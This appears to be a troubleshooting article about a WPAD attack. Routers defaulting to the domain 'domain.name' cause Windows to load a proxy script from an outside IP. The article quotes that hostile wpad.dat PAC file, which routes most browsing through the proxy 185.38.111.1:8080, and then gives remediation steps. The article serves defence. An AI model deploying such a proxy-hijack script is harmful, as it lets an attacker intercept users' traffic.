Share via

Windows 7/10 Troubleshooting: Why is the operating system applying network settings that I have not configured? Wpad attack?

  • Article

Introduction

I managed to come across one of these cases(written in Russian), and I would like to share with you.

Some users have encountered strange behavior. They started to notice that the computer was using strange proxy settings. 

Also when they ping wpad they get a weird response :

C:\Users\Me>ping wpad
Pinging wpad.domain.name 185.38.111.1 with 32  bytes of data:
Reply from  185.38.111.1: bytes=32  time=76ms TTL=48
Reply from  185.38.111.1: bytes=32  time=77ms TTL=48
Reply from  185.38.111.1: bytes=32  time=76ms TTL=48
Reply from  185.38.111.1: bytes=32  time=78ms TTL=48

As I managed to understand, many routers by default have the following domain name: domain.name.
It turns out that this domain name is real, and it contains some strange settings (which some antiviruses have marked as malicious), that Windows 7/10 automatically accepts and applies. 

Also some users noticed that If you specify the following address  in the browser http://wpad/wpad.dat, it will return:

function FindProxyForURL(url, host) {
if (isPlainHostName(host) ||
dnsDomainIs(host, ".windowsupdate.com") ||
dnsDomainIs(host, ".microsoft.com") ||
dnsDomainIs(host, ".baidu.com") ||
dnsDomainIs(host, ".kaspersky.com") ||
dnsDomainIs(host, ".axaltacs.net") ||
dnsDomainIs(host, ".live.com") ||
dnsDomainIs(host, ".drivergenius.com") ||
isInNet(host,  "10.0.0.0", "255.0.0.0") ||
isInNet(host,  "172.16.0.0",  "255.255.224.0") ||
isInNet(host,  "192.168.0.0",  "255.255.0.0") ||
isInNet(host,  "127.0.0.0", "255.0.0.0"))
return "DIRECT";
else
return 'PROXY 185.38.111.1:8080';
}javascript:void(0)

At the time of writing this article, I could not reproduce it, perhaps it only works under certain conditions.

Solution:

1) You need to disable the proxy-server permanently and "Automatically detect settings" in the browser.

  • From Internet Explorer's top menu, click Tools > Internet Options.

  • From the Connections tab, locate the desired connection  then click Settings.
    https://scache.vzw.com/kb/images/common/linote.gif click LAN settings (lower-right corner).

  • Ensure the following settings are disabled (unchecked) then click OK.

  • Automatically detect settings

  • Use Automatic configuration script

  • Use a proxy server for this connection.

2)  You need to change domain name from **domain.name **to **domain.local **(or some other for example my.router) on the router and reload it.